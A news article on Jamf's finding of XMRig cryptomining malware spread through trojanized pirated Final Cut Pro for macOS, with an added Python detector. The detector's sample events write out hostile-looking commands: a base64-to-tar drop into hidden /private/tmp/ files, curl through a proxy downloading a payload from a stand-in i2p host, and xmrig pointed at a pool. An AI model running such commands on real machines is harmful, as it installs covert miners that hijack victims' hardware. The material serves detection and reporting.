A new family of cryptojackers.
N2K, Feb 23, 2023

New cryptomining malware takes aim at macOS systems.

A new family of cryptojackers.

Researchers at Jamf have discovered a new family of macOS cryptomining malware. The malware is evasive, and in some cases it slips past the security measures on machines running macOS Ventura.

Pirated versions of Final Cut Pro deliver cryptominers.

The malware is delivered via a trojanized copy of Final Cut Pro, modified so that it installs the XMRig miner in the background. The researchers found the software being distributed on The Pirate Bay:

“When the user double-clicks the Final Cut Pro icon, the trojanized executable runs, kicking off the shell calls to orchestrate the malware setup. Contained within the same executable are two large base64 blobs that are decoded via shell calls. Decoding both of these blobs results in two corresponding tar archives. One contains a working copy of Final Cut Pro. The other base64 encoded blob decodes to a customized executable responsible for handling the encrypted i2p traffic.

“Once the embedded data has been decoded from base64 and unarchived, the resulting components are written to the /private/tmp/ directory as hidden files. After executing the i2p executable, the setup script uses curl over i2p to connect to the malicious author's web server and download the XMRig command line components that perform the covert mining. The version of Final Cut Pro that is launched and presented to the user is called from this directory and eventually removed from the disk.”
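The chain quoted above maps onto a handful of behaviours a defender can look for in process-execution telemetry: a shell decoding base64 straight into tar, hidden files dropped under /private/tmp/, curl routed through a local i2p proxy, and a process named xmrig starting. The script below is an added example written for this article, not code from Jamf or N2K. The event format, field names and sample events are constructed; that i2p traffic goes through a proxy listening on the loopback interface (port 4444 in the sample) is an assumption about typical i2p deployments, not something the write-up states.

```python
"""Correlate process-execution events into the infection chain described by Jamf.

Added example, not Jamf's or N2K's code. Each event is a constructed record of one
process start (pid, parent pid, executable, command line), the shape an EDR or
Apple's Endpoint Security framework would give you after some normalisation.
"""
import re
from collections import defaultdict

# Constructed sample telemetry: one trojanized Final Cut Pro tree plus two benign processes.
SAMPLE_EVENTS = [
    {"pid": 501, "ppid": 1, "exe": "/Applications/Final Cut Pro.app/Contents/MacOS/Final Cut Pro",
     "cmdline": "/Applications/Final Cut Pro.app/Contents/MacOS/Final Cut Pro"},
    # Shell call decoding an embedded blob directly into a tar archive under /private/tmp/.
    {"pid": 502, "ppid": 501, "exe": "/bin/sh",
     "cmdline": "sh -c 'echo ... | base64 -D | tar -xf - -C /private/tmp/'"},
    # Hidden i2p component started from the staging directory (file name constructed).
    {"pid": 503, "ppid": 501, "exe": "/bin/sh",
     "cmdline": "sh -c '/private/tmp/.i2p --daemon'"},
    # curl fetching the miner through a loopback proxy (assumed i2p HTTP proxy port).
    {"pid": 504, "ppid": 501, "exe": "/usr/bin/curl",
     "cmdline": "curl -x 127.0.0.1:4444 http://example.i2p/payload -o /private/tmp/.xmrig"},
    {"pid": 505, "ppid": 501, "exe": "/private/tmp/.xmrig",
     "cmdline": "/private/tmp/.xmrig -o pool.example:3333"},
    # Benign activity: base64 decode without tar, curl without a proxy. Should not alert.
    {"pid": 601, "ppid": 1, "exe": "/bin/bash",
     "cmdline": "bash -c 'base64 -D < report.b64 > report.pdf'"},
    {"pid": 602, "ppid": 1, "exe": "/usr/bin/curl",
     "cmdline": "curl https://example.org/index.html"},
]

# Each rule is one stage of the chain. Individually these are noisy; together they are not.
RULES = [
    # base64 decode (macOS -D, GNU -d, or --decode) piped straight into tar.
    ("base64_to_tar", re.compile(r"base64\s+(?:-[dD]|--decode)\b.*\|\s*tar\b")),
    # Any dot-prefixed (hidden) path directly under /private/tmp/.
    ("hidden_private_tmp", re.compile(r"/private/tmp/\.[^\s/'\"]+")),
    # curl sent through a proxy on the loopback interface (assumption: local i2p router).
    ("curl_loopback_proxy", re.compile(r"\bcurl\b.*(?:-x|--proxy)\s+(?:127\.0\.0\.1|localhost)\b")),
    # The miner binary itself, by name.
    ("xmrig", re.compile(r"xmrig", re.IGNORECASE)),
]


def match_rules(event):
    """Return the names of every rule that fires on this event's executable or command line."""
    text = event["exe"] + " " + event["cmdline"]
    return [name for name, pattern in RULES if pattern.search(text)]


def root_of(pid, parents):
    """Walk ppid links upward and return the highest ancestor we hold an event for."""
    while parents.get(pid) in parents:
        pid = parents[pid]
    return pid


def correlate(events, min_distinct_stages=2):
    """Group rule hits by root process; return {root_pid: sorted stage names} for trees
    that exhibit at least min_distinct_stages different stages of the chain."""
    parents = {e["pid"]: e["ppid"] for e in events}
    stages = defaultdict(set)
    for event in events:
        for name in match_rules(event):
            stages[root_of(event["pid"], parents)].add(name)
    return {root: sorted(names) for root, names in stages.items()
            if len(names) >= min_distinct_stages}


def report(events):
    """Human-readable alert lines, one per suspicious process tree."""
    by_pid = {e["pid"]: e for e in events}
    return [f"ALERT root pid {root} ({by_pid[root]['exe']}): stages {', '.join(names)}"
            for root, names in correlate(events).items()]


if __name__ == "__main__":
    for line in report(SAMPLE_EVENTS):
        print(line)
```

Keying the correlation on the root of the process tree rather than on individual events is what keeps the benign base64 and curl invocations quiet: each of those fires at most one rule in a tree of its own, while the trojanized application accumulates all four stages under a single parent.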

Apple devices are increasingly attractive for cryptojacking.

The researchers add that since cryptomining “requires a significant amount of processing power, it is likely that the ongoing advancements in Apple ARM processors will make macOS devices even more attractive targets for cryptojacking.”

It’s worth noting that users can avoid this particular malware by refraining from downloading pirated versions of software applications like Final Cut Pro.